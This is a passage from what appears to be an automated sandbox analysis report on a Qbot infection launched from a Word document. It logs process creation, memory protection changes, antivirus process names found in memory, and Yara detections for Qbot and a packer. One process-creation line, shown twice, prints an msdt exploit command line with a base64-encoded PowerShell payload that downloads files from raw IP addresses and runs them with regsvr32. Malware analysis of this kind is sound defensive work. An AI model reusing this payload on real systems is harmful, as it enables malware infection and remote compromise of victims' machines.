                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008BEEBB LoadLibraryA,GetProcAddress,
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\regsvr32.exeMemory protected: page write copy | page execute and write copy | page guard

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Maps a DLL or memory area into another process
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: unknown protection: execute and read and write
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: unknown protection: execute and read and write
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: unknown protection: execute and read and write
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES473B.tmp" "c:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5EDA.tmp" "c:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP"
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: unknown unknown
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: unknown unknown
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: unknown unknown
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4765.tmp" "c:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
                          Source: C:\Windows\SysWOW64\msdt.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008BA065 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008BDD81 GetVersionExA,GetCurrentProcessId,
                          Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
                          Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
                          Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                          Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgcsrvx.exe
                          Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
                          Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Qbot
                          Source: Yara matchFile source: 38.2.regsvr32.exe.12b0184.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.explorer.exe.8b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4a50184.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.explorer.exe.8b0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.47f0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4aa0000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.12b0184.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4a80000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.49b0000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4a50184.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.4990000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.0.explorer.exe.8b0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.47c0184.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.47c0184.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.49b0000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.47f0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4aa0000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.4990000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4a80000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.4810000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.0.explorer.exe.8b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.4810000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.580482048.0000000004990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.580575177.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.580442594.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.580343714.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000000.351550985.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.797056780.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.580400049.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000028.00000002.582578490.00000000047F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000028.00000002.582736314.0000000004810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.580362082.00000000012B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Yara detected CryptOne packer
                          Source: Yara matchFile source: 00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.580343714.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.580362082.00000000012B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                          Remote Access Functionality

                          barindex
                          Yara detected Qbot
                          Source: Yara matchFile source: 38.2.regsvr32.exe.12b0184.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.explorer.exe.8b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4a50184.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.explorer.exe.8b0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.47f0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4aa0000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.12b0184.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4a80000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.49b0000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4a50184.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.4990000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.0.explorer.exe.8b0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.47c0184.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.47c0184.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.regsvr32.exe.49b0000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.regsvr32.exe.47f0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.regsvr32.exe.4aa0000.3.unpack, type: UNPACKEDPE
